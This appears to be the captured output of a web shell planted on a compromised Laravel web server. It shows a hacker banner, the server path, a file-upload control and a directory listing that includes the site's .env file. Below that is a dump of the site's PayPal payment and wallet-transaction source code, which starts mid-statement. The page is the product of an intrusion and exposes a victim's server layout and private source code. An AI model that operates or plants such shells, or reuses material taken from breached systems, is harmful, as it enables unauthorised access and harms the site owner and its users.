I am a hacker in the dark of a very cold night
path :/var/www/html/vorne.webheaydemo.com
upload file:
List of files:
| name file |
size |
edit |
permission |
action |
| .editorconfig | 276 KB | March 05 2024 07:12:34 | 0666 |
|
| .env | 1385 KB | May 24 2024 16:43:55 | 0666 |
|
| .env.example | 1088 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitattributes | 190 KB | March 05 2024 07:12:34 | 0666 |
|
| .gitignore | 245 KB | March 05 2024 07:12:34 | 0666 |
|
| .htaccess | 947 KB | July 04 2023 21:25:08 | 0664 |
|
| .rnd | 1024 KB | March 13 2024 04:51:14 | 0666 |
|
| README.md | 472 KB | March 22 2024 10:35:00 | 0666 |
|
| app | - | March 05 2024 07:12:34 | 0777 |
|
| artisan | 1739 KB | March 05 2024 07:12:34 | 0666 |
|
| bootstrap | - | March 05 2024 07:12:34 | 0777 |
|
| composer.json | 2829 KB | May 13 2024 12:10:04 | 0666 |
|
| composer.lock | 417205 KB | March 19 2024 12:13:14 | 0666 |
|
| config | - | July 03 2025 02:53:36 | 0777 |
|
| database | - | March 05 2024 07:12:34 | 0777 |
|
| index.php | 1816 KB | May 13 2024 10:32:36 | 0666 |
|
| lang | - | May 13 2024 14:53:26 | 0777 |
|
| manifest.json | 913 KB | May 14 2024 03:57:26 | 0664 |
|
| package.json | 398 KB | March 05 2024 07:12:34 | 0666 |
|
| phpunit.xml | 1206 KB | March 05 2024 07:12:34 | 0666 |
|
| public | - | July 03 2025 02:37:20 | 0777 |
|
| resources | - | May 13 2024 12:09:36 | 0777 |
|
| routes | - | March 05 2024 07:12:34 | 0777 |
|
| service-worker.js | 924 KB | March 05 2024 07:12:34 | 0666 |
|
| storage | - | March 05 2024 10:03:52 | 0777 |
|
| symlink.php | 218 KB | March 05 2024 07:12:34 | 0666 |
|
| tests | - | March 05 2024 07:12:34 | 0777 |
|
| vendor | - | March 19 2024 12:13:14 | 0777 |
|
| vite.config.js | 326 KB | March 05 2024 07:12:34 | 0666 |
|
output;
$request_data = $this->request_data;
$credentials = $this->getPaypalCredetials($output);
$config = $this->paypalConfig($credentials,$output['amount']);
$paypalProvider = new PayPalClient;
$paypalProvider->setApiCredentials($config);
$paypalProvider->getAccessToken();
// Payment type wise route distribute
if($request_data['payment_type'] == PaymentGatewayConst::TYPEDONATION){
$redirect_route = [
'common' => 'campaign.details',
'id' => $request_data['campaign_id'],
'slug' => $request_data['campaign_slug'],
];
Session::put('redirect_route', $redirect_route);
$return_url = route('donation.payment.success',PaymentGatewayConst::PAYPAL);
$cancel_url = route('donation.payment.cancel',PaymentGatewayConst::PAYPAL);
}else{
$return_url = route('user.add.money.payment.success',PaymentGatewayConst::PAYPAL);
$cancel_url = route('user.add.money.payment.cancel',PaymentGatewayConst::PAYPAL);
}
$response = $paypalProvider->createOrder([
"intent" => "CAPTURE",
"application_context" => [
"return_url" => $return_url,
"cancel_url" => $cancel_url,
],
"purchase_units" => [
0 => [
"amount" => [
"currency_code" => $output['amount']->sender_cur_code ?? '',
"value" => $output['amount']->total_amount ? number_format($output['amount']->total_amount,2,'.','') : 0,
]
]
]
]);
if(isset($response['id']) && $response['id'] != "" && isset($response['status']) && $response['status'] == "CREATED" && isset($response['links']) && is_array($response['links'])) {
foreach($response['links'] as $item) {
if($item['rel'] == "approve") {
$this->paypalJunkInsert($response);
return redirect()->away($item['href']);
break;
}
}
}
if(isset($response['error']) && is_array($response['error'])) {
throw new Exception($response['error']['message']);
}
throw new Exception("Something went wrong Please try again.");
}
public function getPaypalCredetials($output) {
$gateway = $output['gateway'] ?? null;
if(!$gateway) throw new Exception("Payment gateway not available");
$client_id_sample = ['api key','api_key','client id','primary key'];
$client_secret_sample = ['client_secret','client secret','secret','secret key','secret id'];
$client_id = '';
$outer_break = false;
foreach($client_id_sample as $item) {
if($outer_break == true) {
break;
}
$modify_item = $this->paypalPlainText($item);
foreach($gateway->credentials ?? [] as $gatewayInput) {
$label = $gatewayInput->label ?? "";
$label = $this->paypalPlainText($label);
if($label == $modify_item) {
$client_id = $gatewayInput->value ?? "";
$outer_break = true;
break;
}
}
}
$secret_id = '';
$outer_break = false;
foreach($client_secret_sample as $item) {
if($outer_break == true) {
break;
}
$modify_item = $this->paypalPlainText($item);
foreach($gateway->credentials ?? [] as $gatewayInput) {
$label = $gatewayInput->label ?? "";
$label = $this->paypalPlainText($label);
if($label == $modify_item) {
$secret_id = $gatewayInput->value ?? "";
$outer_break = true;
break;
}
}
}
$mode = $gateway->env;
$paypal_register_mode = [
PaymentGatewayConst::ENV_SANDBOX => "sandbox",
PaymentGatewayConst::ENV_PRODUCTION => "live",
];
if(array_key_exists($mode,$paypal_register_mode)) {
$mode = $paypal_register_mode[$mode];
}else {
$mode = "sandbox";
}
return (object) [
'client_id' => $client_id,
'client_secret' => $secret_id,
'mode' => $mode,
];
}
public function paypalPlainText($string) {
$string = Str::lower($string);
return preg_replace("/[^A-Za-z0-9]/","",$string);
}
public static function paypalConfig($credentials, $amount_info)
{
$config = [
'mode' => $credentials->mode ?? 'live',
'sandbox' => [
'client_id' => $credentials->client_id ?? "",
'client_secret' => $credentials->client_secret ?? "",
'app_id' => "APP-80W284485P519543T",
],
'live' => [
'client_id' => $credentials->client_id ?? "",
'client_secret' => $credentials->client_secret ?? "",
'app_id' => "",
],
'payment_action' => 'Sale', // Can only be 'Sale', 'Authorization' or 'Order'
'currency' => $amount_info->sender_cur_code ?? "",
'notify_url' => "", // Change this accordingly for your application.
'locale' => 'en_US', // force gateway language i.e. it_IT, es_ES, en_US ... (for express checkout only)
'validate_ssl' => true, // Validate SSL when creating api client.
];
return $config;
}
public function paypalJunkInsert($response) {
$output = $this->output;
$user = auth()->guard(get_auth_guard())->user();
$creator_table = $creator_id = $wallet_table = $wallet_id = null;
if($user != null) {
$creator_table = auth()->guard(get_auth_guard())->user()->getTable();
$creator_id = auth()->guard(get_auth_guard())->user()->id;
$wallet_table = $output['wallet']->getTable();
$wallet_id = $output['wallet']->id;
}
if (Auth::guard(get_auth_guard())->check()) {
$user_type = PaymentGatewayConst::AUTHENTICATED;
} else {
$user_type = PaymentGatewayConst::GUEST;
}
// If the condition true then it will be perform for DONATION other wise ADDMONEY
if($output['request_data']['payment_type'] == PaymentGatewayConst::TYPEDONATION){
$data = [
'gateway' => $output['gateway']->id,
'payment_type' => $output['request_data']['payment_type'],
'currency' => $output['currency']->id,
'amount' => json_decode(json_encode($output['amount']),true),
'response' => $response,
'campaign_id' => $output['request_data']['campaign_id'],
'wallet_table' => $wallet_table,
'wallet_id' => $wallet_id,
'creator_table' => $creator_table,
'creator_id' => $creator_id,
'user_type' => $user_type,
'creator_guard' => get_auth_guard(),
];
}else{
$data = [
'gateway' => $output['gateway']->id,
'payment_type' => $output['request_data']['payment_type'],
'currency' => $output['currency']->id,
'amount' => json_decode(json_encode($output['amount']),true),
'response' => $response,
'wallet_table' => $wallet_table,
'wallet_id' => $wallet_id,
'creator_table' => $creator_table,
'creator_id' => $creator_id,
'user_type' => $user_type,
'creator_guard' => get_auth_guard(),
];
}
return TemporaryData::create([
'type' => PaymentGatewayConst::PAYPAL,
'identifier' => $response['id'],
'data' => $data,
]);
}
public function paypalSuccess($output = null) {
if(!$output) $output = $this->output;
$token = $this->output['tempData']['identifier'] ?? "";
$credentials = $this->getPaypalCredetials($output);
$config = $this->paypalConfig($credentials,$output['amount']);
$paypalProvider = new PayPalClient;
$paypalProvider->setApiCredentials($config);
$paypalProvider->getAccessToken();
$response = $paypalProvider->capturePaymentOrder($token);
if(isset($response['status']) && $response['status'] == 'COMPLETED') {
return $this->paypalPaymentCaptured($response,$output);
}else {
throw new Exception('Transaction failed. Payment captured faild.');
}
if(empty($token)) throw new Exception('Transaction faild. Record didn\'t saved properly. Please try again.');
}
public function paypalPaymentCaptured($response,$output) {
// payment successfully captured record saved to database
$output['capture'] = $response;
try{
$this->createTransaction($output);
}catch(Exception $e) {
throw new Exception($e->getMessage());
}
return true;
}
public function createTransaction($output) {
$inserted_id = $this->insertRecord($output);
$this->insertCharges($output,$inserted_id);
$this->insertDevice($output,$inserted_id);
$this->removeTempData($output);
if($this->requestIsApiUser()) {
// logout user
$api_user_login_guard = $this->output['api_login_guard'] ?? null;
if($api_user_login_guard != null) {
auth()->guard($api_user_login_guard)->logout();
}
}
}
public function insertRecord($output) {
$token = $this->output['tempData']['identifier'] ?? "";
DB::beginTransaction();
try{
if(isset($output['request_data']['api_check'])){
$api_check = Auth::guard(get_auth_guard())->check();
if($api_check){
$user_id = auth()->guard(get_auth_guard())->user()->id;
}else{
$user_id = null;
}
}else{
$api_check = Auth::guard(get_auth_guard())->check();
if($api_check){
$user_id = auth()->guard(get_auth_guard())->user()->id;
}else{
$user_id = null;
}
}
// Condintion for type wise payment
if($output['type'] == PaymentGatewayConst::TYPEDONATION){
if($api_check){
// Campaign donation
$trx_id = generateTrxString("transactions","trx_id",'D',9);
$id = DB::table("transactions")->insertGetId([
'user_id' => $user_id,
'user_wallet_id' => $output['wallet']->id,
'payment_gateway_currency_id' => $output['currency']->id,
'campaign_id' => $output['tempData']['data']->campaign_id,
'type' => $output['type'],
'trx_id' => $trx_id,
'request_amount' => $output['amount']->requested_amount,
'payable' => $output['amount']->total_amount,
'available_balance' => $output['wallet']->balance,
'remark' => ucwords(remove_speacial_char($output['type']," ")) . " With " . $output['gateway']->name,
'details' => json_encode($output['capture']),
'status' => true,
'created_at' => now(),
]);
$this->updateCampaign($output);
}else{
// Campaign donation
$trx_id = generateTrxString("transactions","trx_id",'D',9);
$id = DB::table("transactions")->insertGetId([
'payment_gateway_currency_id' => $output['currency']->id,
'type' => $output['type'],
'campaign_id' => $output['tempData']['data']->campaign_id,
'trx_id' => $trx_id,
'request_amount' => $output['amount']->requested_amount,
'payable' => $output['amount']->total_amount,
'remark' => ucwords(remove_speacial_char($output['type']," ")) . " With " . $output['gateway']->name,
'details' => json_encode($output['capture']),
'status' => true,
'created_at' => now(),
]);
$this->updateCampaign($output);
}
}else{
// Add money
$trx_id = generateTrxString("transactions","trx_id",'AM',8);
$id = DB::table("transactions")->insertGetId([
'user_id' => $user_id,
'user_wallet_id' => $output['wallet']->id,
'payment_gateway_currency_id' => $output['currency']->id,
'type' => $output['type'],
'trx_id' => $trx_id,
'request_amount' => $output['amount']->requested_amount,
'payable' => $output['amount']->total_amount,
'available_balance' => $output['wallet']->balance + $output['amount']->requested_amount,
'remark' => ucwords(remove_speacial_char($output['type']," ")) . " With " . $output['gateway']->name,
'details' => json_encode($output['capture']),
'status' => true,
'created_at' => now(),
]);
$this->updateWalletBalance($output);
}
DB::commit();
}catch(Exception $e) {
DB::rollBack();
throw new Exception($e->getMessage());
}
return $id;
}
// Update campaign
public function updateCampaign($output){
$id = $output['tempData']['data']->campaign_id;
$campaign = Campaign::findOrFail($id);
$campaign->update([
'raised' => $campaign->raised + $output['amount']->requested_amount,
'to_go' => $campaign->to_go - $output['amount']->requested_amount,
]);
}
public function updateWalletBalance($output) {
$update_amount = $output['wallet']->balance + $output['amount']->requested_amount;
$output['wallet']->update([
'balance' => $update_amount,
]);
}
public function insertCharges($output,$id) {
DB::beginTransaction();
try{
DB::table('transaction_charges')->insert([
'transaction_id' => $id,
'percent_charge' => $output['amount']->percent_charge,
'fixed_charge' => $output['amount']->fixed_charge,
'total_charge' => $output['amount']->total_charge,
'created_at' => now(),
]);
DB::commit();
if(Auth::guard(get_auth_guard())->check()){
$notification_content = [
'title' => "Add Money",
'message' => "Your Wallet (".$output['wallet']->currency->code.") balance has been added ".$output['amount']->requested_amount.' '. $output['wallet']->currency->code,
'time' => Carbon::now()->diffForHumans(),
'image' => files_asset_path('profile-default'),
];
UserNotification::create([
'type' => NotificationConst::BALANCE_ADDED,
'user_id' => Auth::guard(get_auth_guard())->user()->id,
'message' => $notification_content,
]);
}
DB::commit();
}catch(Exception $e) {
DB::rollBack();
throw new Exception($e->getMessage());
}
}
public function insertDevice($output,$id) {
$client_ip = request()->ip() ?? false;
$location = geoip()->getLocation($client_ip);
$agent = new Agent();
// $mac = exec('getmac');
// $mac = explode(" ",$mac);
// $mac = array_shift($mac);
$mac = "";
DB::beginTransaction();
try{
DB::table("transaction_devices")->insert([
'transaction_id'=> $id,
'ip' => $client_ip,
'mac' => $mac,
'city' => $location['city'] ?? "",
'country' => $location['country'] ?? "",
'longitude' => $location['lon'] ?? "",
'latitude' => $location['lat'] ?? "",
'timezone' => $location['timezone'] ?? "",
'browser' => $agent->browser() ?? "",
'os' => $agent->platform() ?? "",
]);
DB::commit();
}catch(Exception $e) {
DB::rollBack();
throw new Exception($e->getMessage());
}
}
public function removeTempData($output) {
$token = $output['capture']['id'];
TemporaryData::where("identifier",$token)->delete();
}
// ********* For API **********
public function paypalInitApi($output = null) {
if(!$output) $output = $this->output;
$credentials = $this->getPaypalCredetials($output);
$config = $this->paypalConfig($credentials,$output['amount']);
$paypalProvider = new PayPalClient;
$paypalProvider->setApiCredentials($config);
$paypalProvider->getAccessToken();
if($output['request_data']['payment_type'] == PaymentGatewayConst::TYPEDONATION){
$return_url = route('api.v1.user.donation.payment.success',PaymentGatewayConst::PAYPAL."?r-source=".PaymentGatewayConst::APP);
$cancel_url = route('api.v1.user.donation.payment.cancel',PaymentGatewayConst::PAYPAL."?r-source=".PaymentGatewayConst::APP);
}else{
$return_url = route('api.v1.user.add-money.payment.success',PaymentGatewayConst::PAYPAL."?r-source=".PaymentGatewayConst::APP);
$cancel_url = route('api.v1.user.add-money.payment.cancel',PaymentGatewayConst::PAYPAL."?r-source=".PaymentGatewayConst::APP);
}
$response = $paypalProvider->createOrder([
"intent" => "CAPTURE",
"application_context" => [
"return_url" => $return_url,
"cancel_url" => $cancel_url,
],
"purchase_units" => [
0 => [
"amount" => [
"currency_code" => $output['amount']->sender_cur_code ?? '',
"value" => $output['amount']->total_amount ? number_format($output['amount']->total_amount,2,'.','') : 0,
]
]
]
]);
if(isset($response['id']) && $response['id'] != "" && isset($response['status']) && $response['status'] == "CREATED" && isset($response['links']) && is_array($response['links'])) {
foreach($response['links'] as $item) {
if($item['rel'] == "approve") {
$this->paypalJunkInsert($response);
return $response;
break;
}
}
}
if(isset($response['error']) && is_array($response['error'])) {
throw new Exception($response['error']['message']);
}
throw new Exception("Something went wrong Please try again.");
}
}